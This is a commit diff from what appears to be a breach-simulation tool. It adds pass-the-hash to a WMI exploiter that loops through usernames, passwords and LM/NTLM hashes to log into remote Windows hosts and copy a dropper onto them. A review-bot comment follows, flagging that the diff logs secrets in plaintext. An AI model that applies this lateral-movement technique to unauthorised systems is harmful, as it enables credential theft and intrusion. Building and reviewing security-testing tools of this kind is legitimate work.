Add pass-the-hash for wmi

Itay Mizeretz 2017-09-27 18:30:44 +03:00
parent 7e3f420fe0
commit d628a27595
1 changed files with 23 additions and 19 deletions


@ -29,34 +29,36 @@ class WmiExploiter(HostExploiter):
LOG.info("Can't find suitable monkey executable for host %r", host) LOG.info("Can't find suitable monkey executable for host %r", host)
return False return False
user_password_pairs = self._config.get_exploit_user_password_pairs() creds = self._config.get_exploit_user_password_or_hash_product()
for user, password in user_password_pairs: for user, password, lm_hash, ntlm_hash in creds:
LOG.debug("Attempting to connect %r using WMI with password '%s'", LOG.debug("Attempting to connect %r using WMI with user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
host, password) host, user, password, lm_hash, ntlm_hash)
wmi_connection = WmiTools.WmiConnection() wmi_connection = WmiTools.WmiConnection()
try: try:
wmi_connection.connect(host, wmi_connection.connect(host, user, password, None, lm_hash, ntlm_hash)
user,
password)
except AccessDeniedException: except AccessDeniedException:
LOG.debug("Failed connecting to %r using WMI with user,password ('%s','%s')", LOG.debug("Failed connecting to %r using WMI with "
host, user, password) "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
host, user, password, lm_hash, ntlm_hash)
continue continue
except DCERPCException, exc: except DCERPCException as exc:
report_failed_login(self, host, user, password) report_failed_login(self, host, user, password, lm_hash, ntlm_hash)
LOG.debug("Failed connecting to %r using WMI with user,password: ('%s','%s')", LOG.debug("Failed connecting to %r using WMI with "
host, user, password) "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
host, user, password, lm_hash, ntlm_hash)
continue continue
except socket.error, exc: except socket.error as exc:
LOG.debug("Network error in WMI connection to %r with user,password: ('%s','%s') (%s)", LOG.debug("Network error in WMI connection to %r with "
host, user, password, exc) "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
host, user, password, lm_hash, ntlm_hash)
return False return False
except Exception, exc: except Exception as exc:
LOG.debug("Unknown WMI connection error to %r with user,password: ('%s','%s') (%s):\n%s", LOG.debug("Unknown WMI connection error to %r with "
host, user, password, exc, traceback.format_exc()) "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s') (%s):\n%s",
host, user, password, lm_hash, ntlm_hash, exc, traceback.format_exc())
return False return False
host.learn_credentials(user, password) host.learn_credentials(user, password)
@ -77,6 +79,8 @@ class WmiExploiter(HostExploiter):
self._config.dropper_target_path, self._config.dropper_target_path,
user, user,
password, password,
lm_hash,
ntlm_hash,
self._config.smb_download_timeout) self._config.smb_download_timeout)
if not remote_full_path: if not remote_full_path:
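Review bot: Every `LOG.debug` call in the credential loop of the first hunk now writes the plaintext password together with the LM and NTLM hashes to the log, on the attempt line and on all four failure paths. Because `wmi_connection.connect` accepts the hashes in place of a password, they are as sensitive as the password itself, and anyone who can read the debug log or a collected copy of it obtains reusable credentials. Log the user and only which kind of secret was tried, for example `LOG.debug("Attempting to connect %r using WMI with user '%s' (password set: %s, hash set: %s)", host, user, bool(password), bool(lm_hash or ntlm_hash))`, and use the same form in the failure messages. Separately, the `socket.error` branch lost the `(%s)` / `exc` pair it had before, so the network error itself is no longer recorded, and `host.learn_credentials(user, password)` is still called without the hashes, which presumably stores an empty password after a hash-only login and is worth confirming. The method body begins and ends outside the hunks shown.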